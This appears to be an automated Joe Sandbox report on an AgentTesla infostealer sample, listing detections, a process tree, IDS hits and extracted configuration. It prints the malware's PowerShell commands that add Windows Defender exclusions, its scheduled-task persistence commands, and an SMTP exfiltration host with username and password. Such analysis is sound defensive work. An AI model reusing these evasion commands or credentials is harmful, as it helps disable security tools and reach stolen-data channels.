Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Analysis ID:1427139
MD5:78f627add2ccdd0f16400418e5f829b8
SHA1:013aac15ad0a20af80eb1f86cdf27e6159c7ac9b
SHA256:7abd4b1c93d30c7ab8f817ebcf83262950131614590c9b254f05449ec493818c
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe (PID: 5268 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • powershell.exe (PID: 2716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7204 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5484 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • TuZRpLi.exe (PID: 2124 cmdline: C:\Users\user\AppData\Roaming\TuZRpLi.exe MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • schtasks.exe (PID: 7324 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • TuZRpLi.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • TuZRpLi.exe (PID: 7384 cmdline: "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • TuZRpLi.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • TuZRpLi.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.thelamalab.com", "Username": "billing@thelamalab.com", "Password": "Thel@malab@20!9"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000011.00000002.3259301451.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.3258452239.00000000033AE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x316e9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3175b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x317e5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31877:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x318e1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31953:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x319e9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x31a79:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 9 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ParentProcessId: 5268, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", ProcessId: 2716, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ParentProcessId: 5268, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", ProcessId: 2716, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TuZRpLi.exe, ParentImage: C:\Users\user\AppData\Roaming\TuZRpLi.exe, ParentProcessId: 2124, ParentProcessName: TuZRpLi.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp", ProcessId: 7324, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.222.226.100, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, Initiated: true, ProcessId: 6604, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ParentProcessId: 5268, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp", ProcessId: 5484, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ParentProcessId: 5268, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", ProcessId: 2716, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ParentProcessId: 5268, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp", ProcessId: 5484, ProcessName: schtasks.exe

                      Snort Signatures

                      Timestamp:04/17/24-04:38:01.123740
                      SID:2839723
                      Source Port:49704
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:01.123740
                      SID:2851779
                      Source Port:49704
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:01.123740
                      SID:2030171
                      Source Port:49704
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:03.579390
                      SID:2855542
                      Source Port:49705
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:03.579390
                      SID:2855245
                      Source Port:49705
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:03.579390
                      SID:2851779
                      Source Port:49705
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:03.579390
                      SID:2840032
                      Source Port:49705
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:03.579390
                      SID:2030171
                      Source Port:49705
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:01.123740
                      SID:2855542
                      Source Port:49704
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:01.123740
                      SID:2855245
                      Source Port:49704
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:01.123740
                      SID:2840032
                      Source Port:49704
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-04:38:03.579390
                      SID:2839723
                      Source Port:49705
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.thelamalab.com", "Username": "billing@thelamalab.com", "Password": "Thel@malab@20!9"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeReversingLabs: Detection: 18%
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeVirustotal: Detection: 29%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeReversingLabs: Detection: 18%
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeVirustotal: Detection: 29%Perma Link
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeJoe Sandbox ML: detected
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49704 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49704 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49704 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49704 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49704 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49704 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49705 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49705 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49705 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49705 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49705 -> 162.222.226.100:587
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.5:49704 -> 162.222.226.100:587
                      Source: Joe Sandbox ViewIP Address: 162.222.226.100 162.222.226.100
                      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                      Source: global trafficTCP traffic: 192.168.2.5:49704 -> 162.222.226.100:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownDNS traffic detected: queries for: mail.thelamalab.com
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, TuZRpLi.exe, 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.thelamalab.com
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2023593017.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, TuZRpLi.exe, 0000000A.00000002.2050510414.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, K6raBsUk6.cs.Net Code: jBQYf8LWw3h

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large array initializations
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ArffRecord.csLarge array initialization: : array initializer size 617583
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5630000.10.raw.unpack, .csLarge array initialization: : array initializer size 13798
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_00E4E4000_2_00E4E400
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_051073380_2_05107338
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_051073290_2_05107329
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_051053AC0_2_051053AC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D0C9C80_2_05D0C9C8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D04C000_2_05D04C00
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D047C80_2_05D047C8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D06FB80_2_05D06FB8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D066CF0_2_05D066CF
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D066E00_2_05D066E0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D062980_2_05D06298
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D062A80_2_05D062A8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_01879BEA9_2_01879BEA
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_01874AA09_2_01874AA0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_01873E889_2_01873E88
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_0187CE889_2_0187CE88
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_018741D09_2_018741D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_068056C09_2_068056C0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06803F309_2_06803F30
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_0680BCE89_2_0680BCE8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_0680DCF09_2_0680DCF0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06809AB89_2_06809AB8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06802AF09_2_06802AF0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06808B679_2_06808B67
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_068000409_2_06800040
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06804FE09_2_06804FE0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_068032279_2_06803227
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_0109E40010_2_0109E400
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_0612BC4010_2_0612BC40
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_061266CF10_2_061266CF
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_061266E010_2_061266E0
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_06126FB810_2_06126FB8
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_061247C810_2_061247C8
